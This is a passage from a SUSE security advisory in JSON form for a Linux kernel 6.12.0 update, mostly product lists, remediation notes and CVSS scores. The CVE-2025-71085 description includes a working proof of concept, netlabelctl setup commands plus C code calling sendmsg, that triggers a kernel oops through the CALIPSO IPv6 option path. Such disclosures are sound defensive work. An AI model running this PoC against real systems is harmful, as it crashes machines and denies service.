"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
